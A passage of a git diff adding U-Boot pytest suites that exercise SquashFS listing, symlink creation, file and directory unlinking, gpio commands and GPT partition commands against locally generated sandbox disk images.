sqfsls at an empty directory. + + This tests checks if sqfsls will print anything other than the 'Empty directory' + message. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + assert ubman.run_command('sqfsls host 0 empty-dir') == 'Empty directory.' + +def sqfs_ls_at_subdir(ubman): + """ Runs sqfsls at the SquashFS image's subdir. + + This test checks if the path resolution works, since the directory is not the + root. + + Args: + ubman: provides the means to interact with U-Boot's console. 
+ """ + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + output = ubman.run_command('sqfsls host 0 subdir') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_symlink(ubman): + """ Runs sqfsls at a SquashFS image's symbolic link. + + This test checks if the symbolic link's target resolution works. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + # since sym -> subdir, the following outputs must be equal + output = ubman.run_command('sqfsls host 0 sym') + output_subdir = ubman.run_command('sqfsls host 0 subdir') + assert output == output_subdir + + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + for line in expected_lines: + assert line in output + +def sqfs_ls_at_non_existent_dir(ubman): + """ Runs sqfsls at a file and at a non-existent directory. + + This test checks if the SquashFS support won't crash if it doesn't find the + specified directory or if it takes a file as an input instead of an actual + directory. In both cases, the output should be the same. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + out_non_existent = ubman.run_command('sqfsls host 0 fff') + out_not_dir = ubman.run_command('sqfsls host 0 f1000') + assert out_non_existent == out_not_dir + assert '** Cannot find directory. **' in out_non_existent + +def sqfs_run_all_ls_tests(ubman): + """ Runs all the previously defined test cases. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + sqfs_ls_at_root(ubman) + sqfs_ls_at_empty_dir(ubman) + sqfs_ls_at_subdir(ubman) + sqfs_ls_at_symlink(ubman) + sqfs_ls_at_non_existent_dir(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +@pytest.mark.singlethread +def test_sqfs_ls(ubman): + """ Executes the sqfsls test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + ubman: provides the means to interact with U-Boot's console. + """ + build_dir = ubman.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. 
+ ubman.restart_uboot() + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + ubman.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_ls_tests(ubman) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_symlink.py b/test/py/tests/test_fs/test_symlink.py new file mode 100644 index 00000000000..9ffd7e6e54d --- /dev/null +++ b/test/py/tests/test_fs/test_symlink.py @@ -0,0 +1,130 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> +# +# U-Boot File System:symlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. +""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestSymlink(object): + def test_symlink1(self, ubman, fs_obj_symlink): + """ + Test Case 1 - create a link. and follow it when reading + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 1 - create link and read'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link ' % (SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s.link' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink2(self, ubman, fs_obj_symlink): + """ + Test Case 2 - create chained links + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 2 - create chained links'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link1 ' % (SMALL_FILE, SMALL_FILE), + 'ln host 0:0 /%s.link1 /SUBDIR/%s.link2' % ( + SMALL_FILE, SMALL_FILE), + 'ln host 0:0 SUBDIR/%s.link2 /%s.link3' % ( + SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s.link3' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink3(self, ubman, fs_obj_symlink): + """ + Test Case 3 - replace file/link with link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 1 - create link and read'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s ' % (MEDIUM_FILE, SMALL_FILE), + 'ln host 0:0 %s /%s.link ' % (MEDIUM_FILE, MEDIUM_FILE), + ]) + assert('' in ''.join(output)) + + output = ubman.run_command_list([ + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + 
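+ # Loading through the replaced /SMALL_FILE path should now return MEDIUM_FILE's data, so its md5 must match md5val[1]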
output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + output = ubman.run_command_list([ + 'ln host 0:0 %s.link /%s ' % (MEDIUM_FILE, SMALL_FILE), + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + output = ubman.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink4(self, ubman, fs_obj_symlink): + """ + Test Case 4 - create a broken link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with ubman.log.section('Test Case 1 - create link and read'): + + output = ubman.run_command_list([ + 'setenv filesize', + 'ln host 0:0 nowhere /link ', + ]) + assert('' in ''.join(output)) + + output = ubman.run_command( + '%sload host 0:0 %x /link' % + (fs_type, ADDR)) + with ubman.disable_check('error_notification'): + output = ubman.run_command('printenv filesize') + assert('"filesize" not defined' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_unlink.py b/test/py/tests/test_fs/test_unlink.py new file mode 100644 index 00000000000..7e911f02413 --- /dev/null +++ b/test/py/tests/test_fs/test_unlink.py @@ -0,0 +1,118 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:unlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. +""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestUnlink(object): + def test_unlink1(self, ubman, fs_obj_unlink): + """ + Test Case 1 - delete a file + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 1 - unlink (file)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/file1' % fs_type, + '%sls host 0:0 dir1/file1' % fs_type]) + assert('' == ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir1/' % fs_type) + assert(not 'file1' in output) + assert('file2' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink2(self, ubman, fs_obj_unlink): + """ + Test Case 2 - delete many files + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 2 - unlink (many)'): + output = ubman.run_command('host bind 0 %s' % fs_img) + + for i in range(0, 20): + output = ubman.run_command_list([ + '%srm host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i), + '%sls host 0:0 dir2/0123456789abcdef%02x' % (fs_type, i)]) + assert('' == ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 dir2' % fs_type) + assert('0 file(s), 2 dir(s)' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink3(self, ubman, fs_obj_unlink): + """ + Test Case 3 - trying to delete a non-existing file should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 3 - unlink (non-existing)'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir1/nofile' % fs_type]) + assert('nofile: doesn\'t exist' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink4(self, ubman, fs_obj_unlink): + """ + Test Case 4 - delete an empty directory + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 4 - unlink (directory)'): + output = ubman.run_command_list([ + 
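+ # Bind the test image, then delete the empty directory 'dir4'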
'host bind 0 %s' % fs_img, + '%srm host 0:0 dir4' % fs_type]) + assert('' == ''.join(output)) + + output = ubman.run_command( + '%sls host 0:0 /' % fs_type) + assert(not 'dir4' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink5(self, ubman, fs_obj_unlink): + """ + Test Case 5 - trying to deleting a non-empty directory ".." + should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 5 - unlink ("non-empty directory")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink6(self, ubman, fs_obj_unlink): + """ + Test Case 6 - trying to deleting a "." should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 6 - unlink (".")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/.' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_unlink7(self, ubman, fs_obj_unlink): + """ + Test Case 7 - trying to deleting a ".." should fail + """ + fs_type,fs_img = fs_obj_unlink + with ubman.log.section('Test Case 7 - unlink ("..")'): + output = ubman.run_command_list([ + 'host bind 0 %s' % fs_img, + '%srm host 0:0 dir5/..' % fs_type]) + assert('directory is not empty' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_gpio.py b/test/py/tests/test_gpio.py new file mode 100644 index 00000000000..46b674b7653 --- /dev/null +++ b/test/py/tests/test_gpio.py @@ -0,0 +1,315 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2021 Adarsh Babu Kalepalli <opensource.kab@gmail.com> +# Copyright (c) 2020 Alex Kiernan <alex.kiernan@gmail.com> + +import pytest +import time +import utils + +""" + test_gpio_input is intended to test the fix 4dbc107f4683. 
+ 4dbc107f4683:"cmd: gpio: Correct do_gpio() return value" +""" + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input(ubman): + """Test that gpio input correctly returns the value of a gpio pin.""" + + response = ubman.run_command('gpio input 0; echo rc:$?') + expected_response = 'rc:0' + assert(expected_response in response) + response = ubman.run_command('gpio toggle 0; gpio input 0; echo rc:$?') + expected_response = 'rc:1' + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_exit_statuses(ubman): + """Test that non-input gpio commands correctly return the command + success/failure status.""" + + expected_response = 'rc:0' + response = ubman.run_command('gpio clear 0; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio set 0; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio toggle 0; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio status -a; echo rc:$?') + assert(expected_response in response) + + expected_response = 'rc:1' + response = ubman.run_command('gpio nonexistent-command; echo rc:$?') + assert(expected_response in response) + response = ubman.run_command('gpio input 200; echo rc:$?') + assert(expected_response in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_read(ubman): + """Test that gpio read correctly sets the variable to the value of a gpio pin.""" + + ubman.run_command('gpio clear 0') + response = ubman.run_command('gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:0,rc:0' + assert(expected_response in response) + response = ubman.run_command('gpio toggle 0; gpio read var 0; echo val:$var,rc:$?') + expected_response = 'val:1,rc:0' + assert(expected_response in response) + response = ubman.run_command('setenv var; gpio read var nonexistent-gpio; echo val:$var,rc:$?') + expected_response = 'val:,rc:1' + assert(expected_response in response) + +""" +Generic Tests for 'gpio' command on sandbox and real hardware. +The below sequence of tests rely on env__gpio_dev_config for configuration values of gpio pins. + + Configuration data for gpio command. + The set,clear,toggle ,input and status options of 'gpio' command are verified. + For sake of verification,A LED/buzzer could be connected to GPIO pins configured as O/P. + Logic level '1'/'0' can be applied onto GPIO pins configured as I/P + + +env__gpio_dev_config = { + #the number of 'gpio_str_x' strings should equal to + #'gpio_str_count' value + 'gpio_str_count':4 , + 'gpio_str_1': '0', + 'gpio_str_2': '31', + 'gpio_str_3': '63', + 'gpio_str_4': '127', + 'gpio_op_pin': '64', + 'gpio_ip_pin_set':'65', + 'gpio_ip_pin_clear':'66', + 'gpio_clear_value': 'value is 0', + 'gpio_set_value': 'value is 1', + # GPIO pin list to test gpio functionality for each pins, pin should be + # pin names (str) + 'gpio_pin_list': ['gpio@1000031', 'gpio@1000032', 'gpio@20000033'], + # GPIO input output list for shorted gpio pins to test gpio + # functionality for each of pairs, where the first element is + # configured as input and second as output + 'gpio_ip_op_list': [['gpio0', 'gpio1'], ['gpio2', 'gpio3']], +} +""" + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_status_all_generic(ubman): + """Test the 'gpio status' command. + + Displays all gpio pins available on the Board. 
+ To verify if the status of pins is displayed or not, + the user can configure (gpio_str_count) and verify existence of certain + pins.The details of these can be configured in 'gpio_str_n'. + of boardenv_* (example above).User can configure any + number of such pins and mention that count in 'gpio_str_count'. + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_str_count = f['gpio_str_count'] + + #Display all the GPIO ports + cmd = 'gpio status -a' + response = ubman.run_command(cmd) + + for str_value in range(1,gpio_str_count + 1): + assert f["gpio_str_%d" %(str_value)] in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_set_generic(ubman): + """Test the 'gpio set' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'set' option + + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio set ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_clear_generic(ubman): + """Test the 'gpio clear' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'clear' option + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio clear ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_toggle_generic(ubman): + """Test the 'gpio toggle' command. + + A specific gpio pin configured by user as output + (mentioned in gpio_op_pin) is verified for + 'toggle' option + """ + + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_op_pin']; + gpio_set_value = f['gpio_set_value']; + gpio_clear_value = f['gpio_clear_value']; + + cmd = 'gpio set ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + + cmd = 'gpio toggle ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_input_generic(ubman): + """Test the 'gpio input' command. 
+ + Specific gpio pins configured by user as input + (mentioned in gpio_ip_pin_set and gpio_ip_pin_clear) + is verified for logic '1' and logic '0' states + """ + + f = ubman.config.env.get('env__gpio_dev_config',False) + if not f: + pytest.skip("gpio not configured") + + gpio_pin_adr = f['gpio_ip_pin_clear']; + gpio_clear_value = f['gpio_clear_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_clear_value + assert good_response in response + + + gpio_pin_adr = f['gpio_ip_pin_set']; + gpio_set_value = f['gpio_set_value']; + + + cmd = 'gpio input ' + gpio_pin_adr + response = ubman.run_command(cmd) + good_response = gpio_set_value + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_generic(ubman): + """Test various gpio related functionality, such as the input, set, clear, + and toggle for the set of gpio pin list. + + Specific set of gpio pins (by mentioning gpio pin name) configured as + input (mentioned as 'gpio_pin_list') to be tested for multiple gpio + commands. + """ + + f = ubman.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_pin_list', None) + if not gpio_pins: + pytest.skip('gpio pin list are not configured') + + for gpin in gpio_pins: + # gpio input + ubman.run_command(f'gpio input {gpin}') + expected_response = f'{gpin}: input:' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio set + ubman.run_command(f'gpio set {gpin}') + expected_response = f'{gpin}: output: 1' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio clear + ubman.run_command(f'gpio clear {gpin}') + expected_response = f'{gpin}: output: 0' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + + # gpio toggle + ubman.run_command(f'gpio toggle {gpin}') + expected_response = f'{gpin}: output: 1' + response = ubman.run_command(f'gpio status -a {gpin}') + assert expected_response in response + +@pytest.mark.buildconfigspec('cmd_gpio') +def test_gpio_pins_input_output_generic(ubman): + """Test gpio related functionality such as input and output for the list of + shorted gpio pins provided as a pair of input and output pins. This test + will fail, if the gpio pins are not shorted properly. + + Specific set of shorted gpio pins (by mentioning gpio pin name) + configured as input and output (mentioned as 'gpio_ip_op_list') as a + pair to be tested for gpio input output case. 
+ """ + + f = ubman.config.env.get('env__gpio_dev_config', False) + if not f: + pytest.skip('gpio not configured') + + gpio_pins = f.get('gpio_ip_op_list', None) + if not gpio_pins: + pytest.skip('gpio pin list for input and output are not configured') + + for gpins in gpio_pins: + ubman.run_command(f'gpio input {gpins[0]}') + expected_response = f'{gpins[0]}: input:' + response = ubman.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + ubman.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[1]}: output:' + response = ubman.run_command(f'gpio status -a {gpins[1]}') + assert expected_response in response + + ubman.run_command(f'gpio clear {gpins[1]}') + expected_response = f'{gpins[0]}: input: 0' + response = ubman.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response + + ubman.run_command(f'gpio set {gpins[1]}') + expected_response = f'{gpins[0]}: input: 1' + response = ubman.run_command(f'gpio status -a {gpins[0]}') + assert expected_response in response diff --git a/test/py/tests/test_gpt.py b/test/py/tests/test_gpt.py new file mode 100644 index 00000000000..cfc8f1319a9 --- /dev/null +++ b/test/py/tests/test_gpt.py @@ -0,0 +1,350 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2017 Alison Chaiken +# Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved. + +# Test GPT manipulation commands. + +import os +import pytest +import utils + +""" +These tests rely on a 4 MB disk image, which is automatically created by +the test. +""" + +# Mark all tests here as slow +pytestmark = pytest.mark.slow + +def parse_gpt_parts(disk_str): + """Parser a partition string into a list of partitions. + + Args: + disk_str: The disk description string, as returned by `gpt read` + + Returns: + A list of parsed partitions. Each partition is a dictionary with the + string value from each specified key in the partition description, or a + key with with the value True for a boolean flag + """ + parts = [] + for part_str in disk_str.split(';'): + part = {} + for option in part_str.split(","): + if not option: + continue + + if "=" in option: + key, value = option.split("=") + part[key] = value + else: + part[option] = True + + if part: + parts.append(part) + + return parts + +class GptTestDiskImage(object): + """Disk Image used by the GPT tests.""" + + def __init__(self, ubman): + """Initialize a new GptTestDiskImage object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. 
+ """ + + filename = 'test_gpt_disk_image.bin' + + persistent = ubman.config.persistent_data_dir + '/' + filename + self.path = ubman.config.result_dir + '/' + filename + + with utils.persistent_file_helper(ubman.log, persistent): + if os.path.exists(persistent): + ubman.log.action('Disk image file ' + persistent + + ' already exists') + else: + ubman.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 4194304) + os.close(fd) + cmd = ('sgdisk', + '--disk-guid=375a56f7-d6c9-4e81-b5f0-09d41ca89efe', + persistent) + utils.run_and_log(ubman, cmd) + # part1 offset 1MB size 1MB + cmd = ('sgdisk', '--new=1:2048:4095', '--change-name=1:part1', + '--partition-guid=1:33194895-67f6-4561-8457-6fdeed4f50a3', + '-A 1:set:2', + persistent) + # part2 offset 2MB size 1.5MB + utils.run_and_log(ubman, cmd) + cmd = ('sgdisk', '--new=2:4096:7167', '--change-name=2:part2', + '--partition-guid=2:cc9c6e4a-6551-4cb5-87be-3210f96c86fb', + persistent) + utils.run_and_log(ubman, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + utils.run_and_log(ubman, cmd) + + cmd = ('cp', persistent, self.path) + utils.run_and_log(ubman, cmd) + +@pytest.fixture(scope='function') +def state_disk_image(ubman): + """pytest fixture to provide a GptTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. A new disk is returned each time to prevent tests from + interfering with each other.""" + + return GptTestDiskImage(ubman) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read(state_disk_image, ubman): + """Test the gpt read command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt read host 0') + assert 'Start 1MiB, size 1MiB' in output + assert 'Block size 512, name part1' in output + assert 'Start 2MiB, size 1MiB' in output + assert 'Block size 512, name part2' in output + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + assert '0x00001000 0x00001bff "part2"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('partition_type_guid') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_read_var(state_disk_image, ubman): + """Test the gpt read command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt read host 0 gpt_parts') + assert 'success!' in output + + output = ubman.run_command('echo ${gpt_parts}') + parts = parse_gpt_parts(output.rstrip()) + + assert parts == [ + { + "uuid_disk": "375a56f7-d6c9-4e81-b5f0-09d41ca89efe", + }, + { + "name": "part1", + "start": "0x100000", + "size": "0x100000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "33194895-67f6-4561-8457-6fdeed4f50a3", + "bootable": True, + }, + { + "name": "part2", + "start": "0x200000", + "size": "0x180000", + "type": "0fc63daf-8483-4772-8e79-3d69d8477de4", + "uuid": "cc9c6e4a-6551-4cb5-87be-3210f96c86fb", + }, + ] + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_verify(state_disk_image, ubman): + """Test the gpt verify command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt verify host 0') + assert 'Verify GPT: success!' 
in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_repair(state_disk_image, ubman): + """Test the gpt repair command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt repair host 0') + assert 'Repairing GPT: success!' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_guid(state_disk_image, ubman): + """Test the gpt guid command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt guid host 0') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_setenv(state_disk_image, ubman): + """Test the gpt setenv command.""" + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt setenv host 0 part1') + assert 'success!' in output + output = ubman.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '800' + output = ubman.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == '800' + output = ubman.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part1' + output = ubman.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '1' + output = ubman.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '1' + + output = ubman.run_command('gpt setenv host 0 part2') + assert 'success!' in output + output = ubman.run_command('echo ${gpt_partition_addr}') + assert output.rstrip() == '1000' + output = ubman.run_command('echo ${gpt_partition_size}') + assert output.rstrip() == 'c00' + output = ubman.run_command('echo ${gpt_partition_name}') + assert output.rstrip() == 'part2' + output = ubman.run_command('echo ${gpt_partition_entry}') + assert output.rstrip() == '2' + output = ubman.run_command('echo ${gpt_partition_bootable}') + assert output.rstrip() == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_save_guid(state_disk_image, ubman): + """Test the gpt guid command to save GUID into a string.""" + + if ubman.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('gpt guid host 0 newguid') + output = ubman.run_command('printenv newguid') + assert '375a56f7-d6c9-4e81-b5f0-09d41ca89efe' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_uuid(state_disk_image, ubman): + """Test the gpt partittion type UUID command.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part type host 0:1') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_part_type_save_uuid(state_disk_image, ubman): + """Test the gpt partittion type to save UUID into a string.""" + + if ubman.config.buildconfig.get('config_cmd_gpt', 'n') != 'y': + pytest.skip('gpt command not supported') + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part type host 0:1 newguid') + output = 
ubman.run_command('printenv newguid') + assert '0fc63daf-8483-4772-8e79-3d69d8477de4' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_rename_partition(state_disk_image, ubman): + """Test the gpt rename command to write partition names.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + ubman.run_command('gpt rename host 0 1 first') + output = ubman.run_command('gpt read host 0') + assert 'name first' in output + ubman.run_command('gpt rename host 0 2 second') + output = ubman.run_command('gpt read host 0') + assert 'name second' in output + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "first"' in output + assert '0x00001000 0x00001bff "second"' in output + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_swap_partitions(state_disk_image, ubman): + """Test the gpt swap command to exchange two partition names.""" + + ubman.run_command('host bind 0 ' + state_disk_image.path) + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "part1"' in output + assert '0x00001000 0x00001bff "part2"' in output + ubman.run_command('gpt swap host 0 part1 part2') + output = ubman.run_command('part list host 0') + assert '0x00000800 0x00000fff "part2"' in output + assert '0x00001000 0x00001bff "part1"' in output + +@pytest.mark.buildconfigspec('cmd_gpt') +@pytest.mark.buildconfigspec('cmd_gpt_rename') +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.requiredtool('sgdisk') +def test_gpt_set_bootable(state_disk_image, ubman): + """Test the gpt set-bootable command.""" + + 